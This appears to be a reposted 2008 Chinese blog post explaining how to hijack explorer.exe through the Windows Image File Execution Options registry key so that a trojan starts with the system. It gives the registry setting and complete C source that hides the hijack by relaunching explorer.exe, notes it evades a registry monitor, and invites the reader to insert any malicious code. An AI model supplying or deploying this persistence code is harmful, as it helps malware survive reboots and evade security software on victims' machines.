| 关键词: nbsp explorer exe windows down NULL value HKEY WriteReg 注册表 |
映像劫持就不说了(网上查吧)只讲下想法:用映像劫持 劫持windows系统必须启动的一些程序(例如:explorer.exe)[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]"debugger"="c:\\down.exe"->这是你想要随系统启动的程序down.exe的代码, 用VC6.0编译,把编译生成的程序重命名为down.exe 放在C:\下,运行,下次每运行explorer.exe就会跳出一个信息提示窗口(只是个演示)这方法是非常有用的(解决木马随系统启动的另一种方法), 360安全卫士注册表监控没反应其它注册表监控没测试。 //by:down 2008.12.10#include "windows.h"#include "stdio.h"#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//修改入口,程序运行无控制台窗口void WriteReg(int k);void main(void){ STARTUPINFO si; memset(&si, 0, sizeof(STARTUPINFO)); si.cb=sizeof(STARTUPINFO); si.dwFlags=STARTF_USESHOWWINDOW; si.wShowWindow=SW_SHOW; PROCESS_INFORMATION pi; WriteReg(0);//在这里删除IFEO注册表项,不写这段,down.exe会不停的被创建,把debbger内容清空就行了 CreateProcess(NULL, "c:\\windows\\explorer.exe" , NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi);//将explorer.exe启动,这样就看不出有什么异常了//WaitForSingleObject(pi.hProcess,INFINITE); MessageBox(NULL, "test by down!", "test", MB_OK); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); WriteReg(1);//恢复IFFO项}void WriteReg(int k){ HKEY BootKey, hKey; BootKey=HKEY_LOCAL_MACHINE; char *value; char *subk="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe"; if(k==1) { value = "C:\\down.exe"; } else { value=""; } if(RegCreateKey(BootKey, subk, &hKey)==ERROR_SUCCESS) { if(RegSetValueEx(hKey,"debugger",NULL,REG_SZ, (LPBYTE)value, strlen(value)+2)!=ERROR_SUCCESS) { printf("Value set failed!\n"); } } else { puts("Reg open failed!\n"); }} 执行什么恶意代码就看你了。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|